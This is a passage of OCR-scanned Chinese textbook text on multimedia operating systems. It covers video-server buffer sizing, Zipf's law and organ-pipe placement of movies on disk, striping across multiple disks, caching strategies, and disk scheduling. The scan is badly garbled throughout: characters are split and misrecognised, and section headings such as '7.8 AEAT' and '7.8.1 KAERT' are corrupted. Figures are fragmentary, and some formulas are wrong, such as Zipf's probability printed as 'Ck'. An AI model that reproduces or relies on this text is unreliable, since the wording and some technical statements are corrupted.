无 足 轻 重 的 事情 。 使 绥 冲 区 大 到 足以 装 下 24 个 I 帧 是 不 必要 的 过 上 度 行 
为 ， 但 是 使 缓冲 区 大 小 为 24 个 平均 帧 则 要 冒 风险 。 





羊 运 的 是 ， 对 于 任何 一 部 给 定 的 电影 ， 电 影 中 最 大 的 磁道 〈 在 图 7- 
21 的 意义 上 说 〉 事 先是 已 知 的 ， 所 以 可 以 选择 缓冲 区 恰好 为 这 一 大 小 。 


然而 ， 很 有 可 能 发 生 这 样 的 事情 ， 最 大 的 磁道 有 16 个 I 帧 ， 而 第 二 大 的 
磁道 只 有 9 个 I 帧 。 选 择 缓冲 区 的 大 小 能 够 足以 装 下 第 二 大 的 磁道 可 能 

为 明智 。 做 出 这 样 的 选择 意味 着 要 截断 最 大 的 磁道 ， 因 此 对 茶 些 数据 流 
将 舍弃 电影 中 的 一 帧 。 为 避免 低频 干扰 ， 前 一 帧 可 以 再 次 显示 ， 没 有 人 


会 注意 到 这 一 问题 。 





进一步 运用 这 一 方法 ， 如 果 第 三 大 的 磁道 只 有 4 个 I 帧 ， 使 用 能 够 保 
存 4 个 I 帧 和 20 个 P 帧 的 缓冲 区 是 值得 的 。 对 茶 些 数据 流 在 电影 中 两 次 引 
入 两 个 重复 的 帧 可 能 是 可 以 接受 的 。 这 样 做 下 去 何 处 是 头 呢 ? 也 许 是 组 
冲 区 大 小 对 于 99% 的 帧 而 言 足够 大 束 行 了 。 显 然 ， 在 缓冲 区 使 用 的 内 存 
和 电影 的 质量 之 间 存 在 着 权衡 。 注 意 ， 同 时 存在 的 数据 流 越 多 ， 统 计数 
拓 就 越 好 并 且 帧 集合 也 越 均 匀 。 

















7.7.4 ”在 单个 磁盘 上 存放 多 个 文件 


到 目前 为 止 我 们 还 只 考 夸 了 单 部 电影 的 存放 。 在 视频 服务 器 上 ， 当 
然 存在 着 许多 电影 。 如 果 它 们 随机 地 散布 在 磁盘 上 ， 那 么 当 多 部 电影 被 
不 同 的 客户 同时 观看 时 ， 时 间 将 溪 费 在 磁头 在 电影 之 间 来 回 移动 上 。 














通过 观 罕 到 东 些 电影 比 其 他 电影 更 为 流行 并 且 在 磁盘 上 存放 电影 时 
将 注 行 性 考虑 进去 ， 可 以 改进 这 一 情况 。 尽 管 总 的 来 说 有 关 个 别 电影 的 
注 行 性 并 没有 多 少 可 说 的 (除了 有 大 胶 明 星 似 乎 有 所 帮助 以 外 〉 ， 但 是 
大 体 上 关于 电影 的 相对 流行 性 总 还 是 可 以 说 出 一 些 规律 。 





对 于 许多 种 类 的 流行 性 比赛 ， 诸 如 出 租 的 电影 、 从 图 书馆 借 出 的 图 
书 、 访 问 的 Web 网 页 ， 甚 至 一 部 小 说 中 使 用 的 英文 单词 或 者 特大 城市 居 
住 的 人 口 ， 相 对 流行 性 的 一 个 合理 的 近似 遵循 着 一 种 令 人 惊奇 的 可 预测 
模式 。 这 一 模式 是 哈佛 大 学 的 一 位 语言 学 教授 George Zipf (1902- 
1950) 发 现 的 ， 现 在 被 称 为 Zipf 定 律 。 该 定律 说 的 是 ， 如 末 电 影 、 图 
书 、Web 网 页 或 者 单词 按 其 流行 性 进行 排名 ， 那 么 下 一 个 客户 选择 排行 
榜 中 排名 为 k 的 项 的 概率 是 Ck， 其 中 C 是 一 个 归 一 化 常数 。 





因而 ， 前 三 部 电影 的 命中 率 分 别 是 C/1、C/2 和 C/3， 其 中 C 的 计算 要 
使 全 部 项 的 和 为 1。 换 句 话说 ， 如 果 有 N 部 电影 ， 那 么 


C/1+C/2+C/3+C/4+,..+C/N=1 





从 这 一 公式 ，C 可 以 被 计算 出 来 。 对 于 具有 10 个 、100 个 、1000 个 和 
10 000 个 项 的 总 体 ，C 的 值 分 别 是 0.341、0.193、0.134 和 0.102。 例 如 ， 
对 于 1000 部 电影 ， 前 5 部 电影 的 概率 分 别 是 0.134、0.067、0.045、0.034 
和 0.027。 





图 7-22 说 明了 Zipf 定 律 。 只 是 为 了 娱乐 ， 该 定律 被 应 用 于 美国 20 座 
最 大 城市 的 人 口 。Zipf 定 律 预测 第 二 大 城市 应 该 具有 最 大 城市 一 半 的 人 
第 三 大 城市 应 该 具有 最 大 城市 三 分 之 一 的 人 口 ， 以 此 类 推 。 虽 然 不 








O, 
尽 完 美 ， 该 定律 令 人 惊奇 地 吻合 。 


0.300 i 





12 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 
排名 


图 7-22 当 N=20 时 的 Zipf 定 律 曲线 。 方 块 表示 美国 20 座 最 大 城市 的 人 
口 ， 按 排名 顺序 排列 (纽约 第 一 、 洛 杉 矶 第 二 、 芝 加 哥 第 三 等 ) 





对 于 视频 服务 器 上 的 电影 而 言 ，Zipf 定 律 表明 最 流行 的 电影 被 选择 
是 第 二 流行 的 电影 的 两 倍 ， 是 第 三 流行 的 电影 的 三 倍 ， 以 此 类 
推 。 尽 管 分 布 在 开始 时 下 降 得 相当 快 ， 但 是 它 有 着 一 个 长 长 的 尾部 。 例 
如 ， 排 名 50 的 电影 拥有 C/50 的 流行 性 ， 排 名 51 的 电影 拥有 C/51 的 流行 
性 ， 所 以 排名 51 的 电影 的 流行 性 是 排名 50 的 电影 的 50/51， 只 有 大 约 2% 
的 差额 。 随 着 尾部 进一步 延伸 ， 相 邻 电影 间 的 百分比 差额 变 得 越 来 越 
小 。 一 个 结论 就 是 ， 服 务 器 需要 大 量 的 电影 ， 因 为 对 于 前 10 名 以 外 的 电 
影 存在 着 潜在 的 需求 。 











了 解 不 同 电影 的 相对 流行 性 ， 使 得 对 视频 服务 器 的 性 能 进行 建 模 以 
及 将 该 信息 应 用 于 存放 文件 成 为 可 能 。 研 究 已 经 表明 ， 最 佳 的 策略 令 人 
惊奇 地 简单 并 且 独 立 于 分 布 。 这 一 策略 称 为 管 风 花 算法 Corgan-pipe 
algorithm) (Grossman#llSilverman,1973;Wong,1983) 。 该 算法 将 最 流 
行 的 电影 存放 在 磁盘 的 中 央 ， 第 二 和 第 三 流行 的 电影 存放 在 最 流行 的 电 
影 的 两 边 ， 在 这 几 部 电影 的 外 边 是 排名 第 四 和 第 五 的 电影 ， 以 此 类 推 ， 
如 图 7-23 所 示 。 如 果 每 一 部 电影 是 如 图 7-19 所 示 类 型 的 连续 文件 ， 这 样 
的 存放 方式 工作 得 最 好 ;如 果 每 一 部 电影 被 约束 在 一 个 狭窄 的 柱 面 范围 
之 内 ， 这 样 的 存放 方式 也 可 以 扩大 其 使 用 的 范围 。 该 算法 的 名 字 来 自 这 
样 的 事实 一 一 概率 直方 图 看 起 来 像 是 一 个 稍稍 不 对 称 的 管 风 傅 。 
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图 7-23 视频 服务 器 上 文件 的 管风琴 分 布 


该 算法 所 做 的 是 试图 将 磁头 保持 在 磁盘 的 中 央 。 当 服务 器 上 的 电影 
有 1000 部 时 ， 根 据 Zipf 定 律 分 布 ， 排 在 前 5 名 的 电影 代表 了 0.307 的 总 概 
率 ， 这 意味 着 大 约 30% 的 时 间 磁 头 停留 在 为 排 在 前 5 名 的 电影 分 配 的 柱 
面 中 ， 如 果 有 1000 部 电影 可 用 ， 这 是 一 个 惊人 的 数量 。 











7.7.5 在 多 个 磁盘 上 存放 文件 


为 了 获得 更 高 的 性 能 ， 视 频 服 务 器 经 常 拥有 可 以 并 行 运转 的 很 多 磁 
盘 。RAID 有 时 会 被 用 到 ， 但 是 通常 并 不 是 因为 RAID 以 性 能 为 代价 提供 
了 更 高 的 可 靠 性 。 视 频 服务 器 通常 希望 高 的 性 能 而 对 于 校正 传输 错误 不 
怎么 太 关 心 。 除 此 之 外 ， 如 果 RAID 控 制 器 有 太 多 的 磁盘 要 同时 处 理 ， 
那么 RAID 控 制 器 可 能 会 成 为 一 个 瓶颈 。 





更 为 普通 的 配置 只 是 数目 很 多 的 磁盘 ， 有 时 被 称 为 磁盘 园 (disk 
farm) 。 这 些 磁盘 不 像 RAID 那 样 以 同步 方式 旋转 ， 也 不 像 RAID 那 样 包 
含 奇 偶 校 验 位 。 一 种 可 能 的 配置 是 将 电影 A 存放 在 磁盘 1 上 ， 将 电影 B 存 
放 在 磁盘 2 上 ， 以 此 类 推 ， 如 图 7-24a 所 示 。 实 际 上 ， 使 用 新 式 的 磁盘 ， 
每 个 磁盘 上 可 以 存放 硝 干 部 电影 。 








磁盘 一 | A0 





c) d) 


图 7-24 在 多 个 磁盘 上 组 织 多 媒体 文件 的 四 种 方式 : 引 无 条 带 ; b) 所 


有 文件 采用 相同 的 条 带 模 式 ; 9 交错 条 带 ; 四 随机 条 带 





这 一 组 织 方式 实现 起 来 很 简单 ， 并 且 具 有 简单 明了 的 故障 特性 : 如 
打 一 块 磁盘 发 生 故 障 ， 其 上 的 所 有 电影 都 将 不 再 可 用 。 注 意 ， 一 家 公司 
损失 了 一 块 装 满 了 电影 的 磁盘 并 没有 一 家 公司 损失 了 一 块 交 满 了 数据 的 
磁盘 那么 糟糕 ， 因 为 电影 还 可 以 从 DVD 重新 装载 到 一 块 空闲 的 磁盘 中 。 
这 一 方法 的 缺点 是 负载 可 能 没有 很 好 地 平衡 ， 如 果 某 些 磁盘 上 装载 的 是 
目前 十 分 热门 的 电影 ， 而 男 外 的 磁盘 上 装载 的 是 不 太 流行 的 电影 ， 则 系 
统 就 没有 被 充分 利用 。 当 然 ， 一 旦 知道 了 电影 的 使 用 频 紊 ， 那 么 手工 移 
动 某 些 电影 以 平衡 负载 也 是 可 能 的 。 








第 二 种 可 能 的 组 织 方式 是 将 每 一 部 电影 在 多 块 磁盘 上 分 成 条 珊 ， 图 
7-24b 所 示 为 4 部 电影 的 例子 。 让 我 们 和 暂时 假设 所 有 的 帧 大 小 相同 《也 惑 
是 未 压缩 )。 固 定 的 字 节 数 从 电影 A 写 入 磁盘 1， 然 后 相同 的 字 节 数 写 
入 磁盘 2， 直 到 到 达 最 后 一 块 磁 盘 《〈 在 本 例 的 情形 中 是 A3 单 元 ) 。 然 
后 ， 再 次 在 第 一 块 磁盘 处 继续 分 条 带 操 作 ， 写 入 A4 单 元 ， 这 样 进行 下 
去 直到 整个 文件 被 写 完 。 电 影 B、C 和 D 以 同样 的 模式 分 成 条 带 。 








由 于 所 有 的 电影 在 第 一 块 磁盘 开始 ， 这 一 条 带 模式 的 一 个 可 能 的 缺 
点 是 跨 磁 盘 的 负载 可 能 不 平衡 。 一 种 更 好 地 分 散 负 载 的 方法 是 交错 起 始 
磁盘 ， 如 图 7-24c 所 示 。 还 有 一 种 试图 平衡 负载 的 方法 是 对 每 一 文件 使 
用 随机 的 条 融 模 式 ， 如 图 7-24d 所 示 。 


到 目前 为 止 ， 我 们 一 直 假 设 所 有 的 帧 大 小 相同 ， 而 对 于 MPEG-2 电 
影 ， 这 一 假设 是 错误 的 : I 帧 比 P 帧 要 大 得 多 。 有 两 种 方法 可 以 处 理 这 一 
新 出 现 的 问题 ， 按 帧 分 条 带 或 授 块 分 条 带 。 按 帧 分 条 带 时 ， 电 影 A 的 第 
一 帧 作为 连续 的 单位 存放 在 磁盘 1 上 ， 不 管 它 有 多 大 。 下 一 帧 存放 在 磁 
盘 2 上 ， 以 此 类 推 。 电 影 B 以 类 似 的 方式 分 条 带 ， 或 者 在 同一 块 磁盘 上 开 
始 ， 或 者 在 下 一 块 磁盘 上 开始 (如 果 是 交错 条 带 ) ， 或 者 是 在 随机 的 一 
块 磁 各 上 开始 。 因 为 每 次 读 入 一 帧 ， 这 一 条 带 形 式 并 没有 加 快 任何 给 定 
电影 的 读 入 ， 然 而 它 比 图 7-24a 更 好 地 在 磁盘 间 分 散 了 负载 ， 如 果 有 许 
多 人 决定 今 晚 观看 电影 A 而 没有 人 想 看 电影 C， 图 7-24a 的 表现 将 很 粳 
糙 。 总 的 来 说， 在 所 有 的 磁盘 间 分 散 负 载 将 更 好 地 利用 总 的 磁盘 带宽 ， 





并 因此 而 增加 能 够 服务 的 顾客 数目 。 








分 条 带 的 另 一 种 方法 是 按 块 分 条 带 。 对 于 每 部 电影 ， 固 定 大 小 的 单 
元 连续 〈 或 随机 ) 写 到 每 块 磁盘 上 。 每 个 块 包 含 一 个 或 多 个 帧 或 者 其 中 
的 碎片 。 对 于 同一 部 电影 ， 系 统 现在 可 以 发 出 对 多 个 块 的 请 求 ， 每 个 请 
求 要 求 读 数据 到 不 同 的 内 存 缓冲 区 ， 但 是 以 这 样 的 方式 ， 当 所 有 的 请 求 
都 完成 时 ， 一 个 连续 的 电影 片断 (包含 多 个 帧 ) 在 内 存 中 将 被 连续 地 组 
装 好 。 这 些 请 求 可 以 并 行 处 理 。 当 最 后 一 个 请 求 被 满足 时 ， 可 以 用 信和 号 
通知 请 求 进 程 工作 已 经 完成 了 ， 此 时 它 就 可 以 将 数据 传送 给 用 户 。 许 多 
帧 过 后 ， 当 缓冲 区 下 降 到 最 后 几 帧 时 ， 更 多 的 请 求 将 被 发 出 ， 以 便 预 装 
载 另外 一 个 缓冲 区 。 这 一 方法 使 用 了 大 量 的 内 存 作为 缓冲 区 ， 从 而 使 磁 
盘 保 持 忙碌 。 在 一 个 具有 1000 个 活跃 用 户 和 1MB 组 冲 区 的 系统 上 《【 例 
如 ， 在 4 块 磁 盘 中 的 每 块 上 使 用 256KB 的 磁盘 块 ) ， 将 需要 1GB 的 RAM 
作为 缓冲 区 。 在 1000 个 用 户 的 服务 器 上 ， 这 样 的 内 存 用 量 只 是 “小 意 


思 ”， 应 该 不 会 有 问题 。 











关于 条 带 的 最 后 一 个 问题 是 在 多 少 个 磁盘 上 分 条 带 。 在 一 个 极端 ， 
每 部 电影 将 在 所 有 的 磁盘 上 分 成 条 带 。 例 如 ， 对 于 2GB 的 电影 和 1000 块 
磁盘 ， 可 以 将 2MB 的 磁盘 块 写 在 每 块 磁盘 上 ， 这 样 就 没有 电影 两 次 使 用 
同一 块 磁盘 。 在 另 一 个 极端 ， 磁 盘 被 分 区 为 小 的 组 〈 如 同 图 7-24 那 
样 ) ， 并 且 每 部 电影 被 限制 在 一 个 分 区 中 。 前 者 称 为 宽 条 带 〈wide 
striping) ， 它 在 平衡 磁盘 间 负 载 方面 工作 恨 好 。 它 的 主要 问题 是 每 部 电 








影 使 用 了 所 有 磁盘 ， 如 果 一 块 磁盘 出 现 故障 ， 那 么 就 没有 电影 可 以 观看 
Jo BERNEZ (narrow striping) ， 它 将 遭遇 热点 〈 广 受 欢 迎 的 分 
KO 的 问题 ， 但 是 损失 一 块 磁盘 将 只 是 葬送 存放 在 其 分 区 中 的 电影 。 对 
于 可 变 大 小 帧 的 划分 条 带 ，Shenoy 和 Vin (1999) 在 数学 上 进行 了 详细 


7.8 AEAT 








传统 的 LRU 文 件 高 速 缓存 对 于 多 媒体 文件 而 言 工 作 得 并 不 好 ， 这 是 
因为 电影 的 访问 模式 与 文本 文件 有 所 不 同 。 在 传统 的 LRU 组 种 区 高 速 绥 
存 背 后 的 思想 是 ， 当 一 个 块 被 使 用 之 后 ， 应 该 将 其 保存 在 高 速 缓存 中 ， 
以 防 很 快 再 次 需要 访问 它 。 例 如 ， 在 编辑 一 个 文件 的 时 候 ， 文 件 被 写 入 
的 一 组 磁盘 块 很 可 能 反复 地 被 用 到 ， 直 到 编辑 过 程 结 束 。 换 言 之 ， 如 果 
一 个 磁盘 块 在 短暂 的 时 间 间 隔 内 存在 比较 高 的 可 能 性 要 被 重用 的 话 ， 它 
就 值得 保存 在 高 速 缓存 之 中 ， 以 免 将 来 对 磁盘 的 访问 。 























对 于 多 媒体 而 言 ， 通 利 的 访问 模式 是 按 顺 序 从 头 到 尾 观看 一 部 电 
影 。 一 个 块 不 太 可 能 被 使 用 两 次 ， 除 非 用 户 对 电影 进行 倒 带 操作 以 再 次 
观看 东 一 场景 。 因 此 ， 通 利 的 高 速 缓存 技术 是 行 不 通 的 。 然 而 ， 高 速 组 
存 仍然 是 可 以 有 帮助 的 ， 只 不 过 是 要 以 不 同 的 方式 使 用 。 在 下 面 几 小 
节 ， 我 们 来 看 一 看 适用 于 多 媒体 的 高 速 缓存 技术 。 








7.8.1 KAERT 


尽管 只 是 将 一 个 块 保存 起 来 期 望 它 可 能 很 快 再 次 被 用 到 是 没有 意义 
的 ， 但 是 可 以 利用 多 媒体 系统 的 可 预测 性 ， 使 蝇 速 缓存 再 度 成 为 十 分 有 
葡 的 技术 。 假 设 两 个 用 户 正在 观看 同一 部 电影 ， 其 中 一 个 用 户 在 另 一 个 





用 户 2 秒 钟 之 后 开始 观看 。 当 第 一 个 用 户 取出 并 观看 了 任何 一 个 给 定 的 
块 之 后 ， 很 有 可 能 第 二 个 用 户 在 2 秒 钟 后 将 需要 相同 的 块 。 系 统 很 容易 
跟 踊 哪些 电影 只 有 一 个 观众 ， 哪 些 电影 有 两 个 或 更 多 个 在 时 间 上 相隔 很 
近 的 观众 。 





因此 ， 只 要 一 部 电影 中 的 一 个 块 读 出 后 很 快 会 再 次 需要 ， 对 其 进行 
高 速 缓存 束 是 有 意义 的 ， 当 然 是 否 进 行 高 速 缓存 还 取决 于 它 要 和 被 高 速 绥 
存 多 长 时 间 以 及 内 存 有 多 紧张 。 这 里 应 该 使 用 不 同 的 策略 ， 而 不 是 将 所 
有 磁盘 块 保留 在 高 速 缓存 之 中 并 且 在 高 速 缓存 被 填 满 之 后 淘汰 最 近 了 最 少 
使 用 的 。 对 于 在 第 一 个 观众 之 后 AT 时 间 之 内 有 第 二 个 观众 的 每 一 部 电 
影 ， 可 以 将 其 标记 为 可 高 速 缓 仓 的 ， 并 且 高 速 缓存 其 所 有 磁盘 块 直到 第 
二 个 观众 (也 可 能 是 第 三 个 观众 ) 使 用 。 对 于 其 他 的 电影 ， 根 本 不 需要 
进行 高 速 缓存 。 

















这 一 思想 还 可 以 进一步 发 挥 。 在 某 些 情况 下 合并 两 个 视频 流 是 可 行 
的 。 假 设 两 个 用 户 正 在 观看 同一 部 电影 ， 但 是 在 两 个 用 户 之 间 存 在 10 秒 
钟 的 延迟 。 在 高 速 缓存 中 保留 10 秒 钟 的 磁盘 块 是 有 可 能 的 ， 但 是 要 浪费 
内 存 。 一 种 蔡 代 的 方法 是 试图 使 两 部 电影 同步 ， 这 一 方法 可 以 通过 改变 
两 部 电影 的 帧 率 实 现 ， 图 7-25 演 示 了 这 一 思想 。 
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图 7-25 a) 两 个 用 户 观 看 失 步 10 秒 钟 的 同一 部 电影 ; b) 将 两 个 视频 流 合 
HAL 





在 图 7-25a 中 ， 两 部 电影 均 以 每 分 钟 1800 帧 的 NTSC 速 率 播 放 ， 由 于 
用 户 2 开 始 晚 了 10 秒 钟 ， 他 将 在 整 部 电影 播放 过 程 中 落后 10 秒 钟 。 然 
而 ， 在 图 7-25b 中 ， 当 用 户 2 到 来 时 ， 用 户 1 的 视频 流 将 放 慢 ， 在 接 下 来 
的 3 分 钟 里 ， 它 不 是 以 每 分 钟 1800 帧 的 速率 播放 ， 而 是 以 每 分 钟 1750 帧 
的 速率 播放 ，3 分 钟 后 ， 它 正 处 于 第 5550 帧 。 与 此 同时 ， 用 户 2 的 视频 流 
在 最 初 的 3 分 钟 里 以 每 分 钟 1850 帧 的 速率 播放 ，3 分 钟 后 ， 它 同样 也 处 于 








第 5550 帧 。 从 此 刻 之 后 ， 两 个 视频 流 均 以 正常 速度 播放 。 


在 追赶 阶段 ， 用 户 1 的 视频 流 运 行 速度 慢 了 2.8%， 而 用 户 2 的 视频 流 
运行 速度 快 了 2.8%。 用 户 不 太 可 能 会 注意 到 这 一 点 。 然 而 ， 如 果 对 此 有 
所 担心 ， 那 么 追赶 阶段 可 以 在 比 3 分 钟 更 长 的 时 间 间 隔 上 展开 。 


一 种 降低 一 个 用 户 的 速度 以 便 与 男 一 个 视频 流 合 并 的 可 选 方法 是 ， 
给 用 户 以 在 他 们 的 电影 中 包含 广告 的 选项 ， 与 无 广告 的 电影 相 比 ， 其 观 
看 价格 比较 低 。 用 户 还 可 以 选择 产品 门类 ， 这 样 广告 的 侵扰 就 会 小 一 些 
而 更 有 可 能 被 观看 。 通 过 对 广告 的 数目 、 长 度 和 时 间 安 排 进行 巧妙 的 操 
作 ， 视 频 流 就 可 以 被 阻 滞 足 够 长 的 时 间 ， 以 便 与 期 望 的 视频 流 取 得 同步 
(Krishnan, 1999) 。 


7.8.2 ”文件 高 速 缓存 


在 多 媒体 系统 中 高 速 缓存 还 能 够 以 不 同 的 方式 提供 帮助 。 由 于 大 多 
数 电影 都 非常 大 〈3 一 6GB) ， 视 频 服务 器 通 向 不 能 在 磁盘 上 存放 所 有 
这 些 文件 ， 所 以 要 将 它们 存放 在 DVD 或 磁带 上 。 当 需要 一 部 电影 的 时 
候 ， 它 总 是 可 以 被 复制 到 磁盘 上 ， 但 是 存在 大 量 的 局 动 时 间 来 查找 电影 
并 将 其 复制 到 磁盘 上 。 因 此， 大 多 数 视频 服务 费 维 护 着 一 个 请 求 最 频繁 
的 电影 的 磁盘 高 速 缓存 。 流 行 的 电影 将 完整 地 存放 在 磁盘 上 。 使 用 高 速 
缓存 的 另 一 种 方法 是 在 磁盘 上 保存 每 部 电影 的 最 初 儿 分 钟 。 这 样 ， 当 一 
部 电影 被 请 求 时 ， 可 以 立刻 从 磁盘 文件 开始 回放 ， 与 此 同时 ， 电 影 从 
DVD 或 磁带 复制 到 磁 千 上 。 通 过 始终 在 磁盘 上 存放 电影 足够 长 的 部 分 ， 
电影 的 下 一 个 片断 在 它 需 要 之 前 就 已 经 取 到 磁盘 上 的 概率 会 很 高 。 如 果 
一 切 都 进行 得 很 好 ， 整 部 电影 将 在 它 需 要 之 前 就 已 经 在 磁盘 上 了 ， 然 后 
它 将 进入 高 速 缓存 并 且 停 留 在 磁盘 上 以 备 随 后 有 更 多 的 请 求 。 如 果 太 多 
的 时 间 过 去 而 没有 另外 的 请 求 ， 电 影 将 从 高 速 缓存 中 删除 ， 以 便 为 更 为 
流行 的 电影 腾 出 空间 。 









































7.9 多 媒体 磁盘 调度 


多 媒体 对 磁盘 提出 了 与 传统 的 、 面 癌 文 本 的 应 用 程序 “例如 编译 嘎 
或 字 处 理 器 ) 有 所 不 同 的 要 求 。 特 别 是 ， 多 媒体 要 求 极 高 的 数据 率 和 数 
所 的 实时 传输 。 这 些 都 不 是 轻易 就 能 够 提供 的 。 此 外 ， 在 视频 服务 器 的 
情形 中 ， 让 一 个 服务 此 同时 处 理 几 干 个 客户 还 存在 着 经 济 压力 。 这 些 需 
求 影响 着 整个 系统 。 上 面 我 们 了 解 了 文件 系统 ， 现 在 让 我 们 来 看 一 看 多 
媒体 磁盘 调度 。 











7.9.1 静态 人 磁盘 调度 


尽管 多 媒体 对 系统 的 所 有 部 分 提出 了 巨大 的 实时 和 数据 率 要 求 ， 但 
是 它 还 有 一 个 特性 使 其 比 传统 的 系统 更 加 容易 处 理 ， 这 就 是 可 预测 性 。 
在 传统 的 操作 系统 中 ， 对 磁盘 块 的 请 求 是 以 相当 不 可 预测 的 方式 发 出 
的 。 磁 盘子 系统 所 能 做 的 最 好 不 过 是 对 于 每 个 打开 的 文件 执行 一 个 磁盘 
块 的 预 读 ， 除 此 之 外 ， 它 能 够 做 的 全 部 事情 就 是 等 待 请 求 的 到 来 ， 并 且 
在 请 求 时 对 它们 进行 处 理 。 多 媒体 就 不 同 了 ， 每 个 活动 的 视频 流 对 系统 
施加 明确 的 负载 ， 使 系统 成 为 高 度 可 预测 的 。 就 NTSC 回 放 而 言 ， 每 
33.3ms， 每 个 客户 将 需要 其 文件 中 的 下 一 帧 ， 并 且 系统 有 33.3ms 的 时 间 
提供 所 有 的 帧 〈 系 统 对 每 个 视频 流 需 要 缓冲 至 少 一 帧 ， 所 以 取 第 k+1 帧 
可 以 与 第 k 帧 的 回放 并 行 处 理 )。 














这 一 可 预测 的 负载 可 以 用 来 使 用 为 多 媒体 甬 裁 的 算法 对 磁盘 进行 调 
度 。 下 面 我 们 将 只 考虑 一 个 磁盘 ， 但 是 其 思想 也 可 以 运用 于 多 个 磁盘 。 
就 这 个 例子 而 言 ， 我 们 将 假设 存在 10 个 用 户 ， 每 个 用 户 观看 不 同 的 电 

。 上 此外， 我们 还 将 假设 所 有 的 电影 具有 相同 的 分 辨 率 、 帧 率 和 其 他 特 





根据 系统 的 其 他 部 分 ， 计 算 机 可 能 有 10 个 进程 ， 每 个 视频 流 一 个 进 
程 ， 或 者 有 一 个 具有 10 个 线程 的 进程 ， 或 者 甚至 只 有 一 个 具有 一 个 线程 
的 进程 ， 以 轮转 方式 处 理 10 个 视频 流 。 细 节 并 不 重要 ， 重 要 的 是 ， 时 间 
被 分 割 成 回环 Ground) ， 在 这 里 一 个 回环 是 一 帧 的 时 间 (对 于 NTSC 是 
33.3ms， 对 于 PAL 是 40ms) 。 在 每 一 回环 的 开始 ， 为 每 个 用 户 生 成 一 个 
磁盘 请 求 ， 如 图 7-26 所 示 。 


视频 流 


奇数 帧 的 缓冲 区 
偶数 帧 的 缓冲 区 





请 求 的 fb fit 块 701 92 281 130 326 410 160 466 204 524 


优化 算法 








92 130 160 204 281 326 410 466 524 701 
人 磁盘 请 求 被 处 理 的 顺序 一 一 ~ 


图 7-26 在 一 个 回环 中 ， 每 部 电影 请 求 一 帧 


在 回环 的 起 始 处 ， 当 所 有 的 请 求 都 进来 之 后 ， 磁 盘 就 会 知道 在 那个 
回环 期 间 它 必须 做 什么 ， 它 还 知道 直到 处 理 完 这 些 请 求 并 且 下 一 个 回环 
开始 ， 不 会 有 其 他 的 请 求 进来 。 因 此 ， 它 能 够 以 优化 的 方法 对 请 求 排 
序 ， 可 能 是 以 柱 面 顺序 (可 以 想象 在 某 些 情形 也 可 能 以 局 区 顺序 〉 排 
序 ， 然 后 以 优化 的 顺序 对 它们 进行 处 理 。 在 图 7-26 中 ， 显 示 的 请 求 是 以 
柱 面 顺序 排序 的 。 





乍 一 看 ， 人 们 可 能 会 认为 以 这 样 的 方式 优化 磁盘 没有 什么 价值 ， 因 
为 只 要 磁盘 满足 最 终 时 限 ， 那 么 它 是 以 1ms 的 富余 满足 还 是 以 10ms 的 富 
余 满 足 并 没有 什么 关系 。 然 而 ， 这 一 结论 是 错误 的 。 通 过 以 这 样 的 方式 
优化 寻 道 ， 处 理 每 一 请 求 的 平均 时 间 就 缩短 了 ， 这 意味 着 一 般 来 说 每 一 
回环 磁盘 可 以 处 理 更 多 的 视频 流 。 换 句 话 说 ， 像 这 样 优化 磁盘 请 求 增加 
了 服务 器 可 以 同时 传送 的 电影 数 。 回 环 末 尾 的 富余 时 间 还 可 以 用 来 服务 
可 能 存在 的 任何 非 实 时 请 求 。 











如 采 服 务 器 有 太 多 的 视频 流 ， 倘 尔 也 会 出 现 当 要 求 从 磁盘 的 边缘 部 
分 读 取 帧 时 错过 了 最 终 时 限 的 情况 。 但 是 ， 只 要 错过 最 终 时 限 的 情况 足 
够 稀少 ， 以 此 换取 同时 处 理 更 多 的 视频 流 还 是 可 以 容 妨 的 。 注 意 ， 要 紧 
的 是 读 取 的 视频 流 的 数目 ， 每 个 视频 流 有 两 个 或 更 多 个 客户 并 不 影响 磁 
盘 性 能 或 调度 。 








为 了 保持 输出 给 客户 的 数据 流 运行 流畅 ， 在 服务 硕 中 采用 双 组 冲 是 
必要 的 。 在 第 1 个 回环 期 间 ， 使 用 一 组 缓冲 区 ， 每 个 视频 流 一 个 缓冲 


区 。 在 这 个 回环 结束 的 时 候 ， 输 出 进程 或 进程 组 被 解除 阻 竖 并 且 被 告知 
传输 第 1 帧 。 与 此 同时 ， 新 的 请 求 进来 请 求 每 部 电影 的 第 2 帧 “每 部 电影 
或 许 有 一 个 磁盘 线程 和 一 个 输出 线程 》。 这 些 请 求 必须 用 第 二 组 绥 冲 区 
来 满足 ， 因 为 第 一 组 绥 冲 区 仍然 在 忙碌 中 。 当 第 3 个 回环 开始 的 时 候 ， 
第 一 组 缓冲 区 已 经 空 几 ， 可 以 重新 用 来 读 取 第 3 帧 。 











我 们 一 直 在 假设 每 一 帧 只 有 一 个 回环 ， 这 一 限制 并 不 是 严格 必需 
的 。 每 一 帧 也 可 以 有 两 个 回环 ， 以 便 减 少 所 需 缓 冲 区 空间 的 数量 ， 其 代 
价 是 磁盘 操作 的 次 数 增加 了 一 倍 。 类 似 地 ， 每 一 回环 可 以 从 磁盘 中 读 取 
两 帧 “假设 一 对 帧 连续 地 存放 在 磁 始 上 ) 。 这 一 设计 将 磁盘 操作 的 数目 
减少 了 一 半 ， 其 代价 是 所 需 缓冲 区 空间 的 数量 增加 了 一 倍 。 依 徘 相 对 可 
利用 率 、 性 能 和 内 存 费 用 与 磁盘 IO 的 对 比 ， 可 以 计算 并 使 用 优化 策 
Hgo 


7.9.2 ”动态 人 磁盘 调度 


在 上 面 的 例子 中 ， 我 们 假设 所 有 的 视频 流 具 有 相同 的 分 辨 灰 、 帧 率 
和 其 他 特性 ， 现 在 让 我 们 放弃 这 一 假设 。 不 同 的 电影 现在 可 能 具有 不 同 
的 数据 率 ， 所 以 不 可 能 每 33.3ms 有 一 个 回环 并 且 为 每 个 视频 流 读 取 一 
帧 。 对 磁盘 的 请 求 或 多 或 少 是 随机 到 来 的 。 








每 一 读 请 求 需要 指定 要 读 的 是 哪 一 磁盘 块 ， 男 外 还 要 指定 什么 时 间 
再 要 该 磁盘 块 ， 也 就 是 最 终 时 限 。 为 简单 起 见 ， 我 们 假设 对 于 每 次 请 求 
实际 的 服务 时 间 是 相同 的 《尽管 这 肯定 是 不 真实 的 ) 。 以 这 种 方法 ， 我 
们 可 以 从 每 次 请 求 减 去 固定 的 服务 时 间 ， 得 到 请 求 能 够 发 出 并 且 还 能 满 
足 最 终 时 限 的 最 近 的 时 间 。 因 为 磁盘 调度 程序 所 关心 的 是 对 请 求 进行 调 
